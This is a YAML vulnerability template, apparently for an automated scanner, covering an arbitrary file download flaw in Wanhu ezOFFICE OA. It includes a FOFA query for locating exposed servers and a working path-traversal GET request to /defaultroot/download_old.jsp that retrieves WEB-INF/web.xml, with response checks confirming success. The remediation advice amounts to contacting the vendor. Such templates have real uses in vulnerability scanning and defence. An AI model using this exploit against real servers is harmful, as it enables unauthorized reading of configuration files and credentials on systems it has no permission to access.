product: 万户网络ezOFFICE
vName: 万户 ezoffice download_old.jsp - Arbitrary File Read
type: 文件读取
vID: [ ]
level: 3
vDesc: There is an arbitrary file download vulnerability in the Wanhu OA download_old.jsp file. An attacker can download any file on the server through the vulnerability.
version: ''
note: ''
search:
  FOFA: app="万户网络-ezOFFICE"
protocol: http
link: http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20download_old.jsp%20任意文件下载漏洞.html
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /defaultroot/download_old.jsp?path=..&name=x&FileName=WEB-INF/web.xml
    verify:
      logic: and
      check:
        - body:
            value:
              - <?xml version=
              - web-app
              - display-name
            logic: and
        - status: 200
